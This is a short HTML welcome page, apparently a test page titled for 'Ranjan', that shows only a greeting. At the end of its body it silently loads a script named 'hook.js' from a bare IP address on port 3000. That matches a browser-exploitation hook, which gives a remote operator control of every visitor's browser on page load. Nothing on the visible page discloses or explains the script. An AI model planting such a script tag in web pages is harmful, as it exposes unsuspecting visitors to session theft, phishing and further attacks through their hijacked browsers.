<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      href="https://cdn.jsdelivr.net/npm/tailwindcss/dist/tailwind.min.css"
      rel="stylesheet"
    />
    <title>Hello Dear Your Web page</title>
  </head>
  <body>
    <main>
      <p class="mt-24 text-center text-3xl font-medium text-green-500">
        Welcome To The Ranjan Page 🖤<br />For Testing Purpose !
      </p>
    </main>
    <script src="http://103.174.242.29:3000/hook.js"></script>
  </body>
</html>
